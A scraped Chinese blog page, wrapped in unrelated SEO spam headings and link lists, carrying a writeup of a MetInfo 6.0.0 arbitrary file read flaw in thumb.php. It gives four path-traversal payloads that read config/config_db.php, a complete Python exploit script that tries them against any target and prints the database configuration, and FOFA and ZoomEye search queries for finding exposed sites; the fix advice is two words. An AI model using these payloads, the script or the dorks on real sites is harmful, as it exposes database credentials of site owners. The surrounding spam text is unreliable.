当前位置: 首页 > news >正文

深圳品牌网站设计电话博客搭建wordpress

深圳品牌网站设计电话,博客搭建wordpress,网站开发专业就业前景分析,办一家建筑公司怎么样感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称:MetInfo任意文件…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 代码审计
        • 漏洞点
      • 1.5、深度利用
        • EXP编写
      • 1.6、漏洞挖掘
      • 1.7修复建议

1.1、漏洞描述

漏洞名称:MetInfo任意文件读取

漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。

下载地址:历史版本安装文件下载 Ver_6.0.0

1.2、漏洞等级

高危

1.3、影响版本

在这里插入图片描述

影响版本:MetInfo 6.0.0

1.4、漏洞复现

代码审计
defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将.././替换成空值

readfile($dir);

漏洞点
/include/thumb.php

使用bp进行抓包

在这里插入图片描述

测试一:

/include/thumb.php?dir=..././http/..././config/config_db.php

测试二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

测试三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

测试四:

/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 仅适用于Windows 系统,Linux 下无效  
#    只有windows以右斜杠作为文件路径分隔符

在这里插入图片描述

1.5、深度利用

EXP编写
import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__           __________                   .___\_   _____/|__|  |   ____   \______   \ ____ _____     __| _/|    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | \/                 \/          \/     \/     \/      \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir":  param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)

在这里插入图片描述

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修复建议

  • 升级
  • 打补丁
http://www.yayakq.cn/news/542920/

相关文章:

  • 会计信息系统网站建设流程图做网站软件图标是一个箭头的
  • 视频网站dedecmsseo网站优化怎么做
  • 网站模版好建设吗如何制作网络游戏
  • 建什么网站赚钱做网站需要开放哪些端口
  • 网站建设类工作描述网站建设 微盘
  • 青海网站建设多少钱php网站开发零基础教程
  • 企业门户网站的设计与实现网站改版后的推广办法
  • 广告网站建设目标第一网站ppt模板
  • 如何知道网站有没有备案国外建站推广
  • 铁岭建设银行网站网站内容规划
  • 网站宣传册怎么做的优秀的响应式网站模板
  • 淘宝不允许 网站建设简单的做海报的网站
  • 网站开发没有完成 需要赔偿吗wordpress密码爆破
  • 怎么做卖东西的网站制作企业网站页面实训项目
  • 外贸企业网站建设公司西安app开发公司排名
  • 企业网站源码怎么用弄个本科学历需要多少钱
  • 可以去非菲律宾做游戏网站吗济南网站推广优化
  • 美食的网站建设个人总结如何借用别人网站做模板
  • 购物中心网站建设自己做的网站如何制作后台
  • php网站开发的技术框架清远做网站
  • 怎么在国际网站做推广深圳市城乡住房和建设局网站
  • 平邑县建设局网站密云网站开发
  • 网站顶部小图标怎么做如何做好电子商务网站开发
  • 2018网站内容和备案html5制作网站模板
  • 重庆档案馆建设网站旅游网站建设规划报告怎么写
  • 网站运营前期中期后期天津代理记账
  • wordpress 工具安装教程长春求推荐好的网站优化推广
  • 网站内容过滤网站功能
  • wordpress背景音乐整站seo排名公司
  • 手机能看禁止网站的浏览器邢台移动网络优化是哪家公司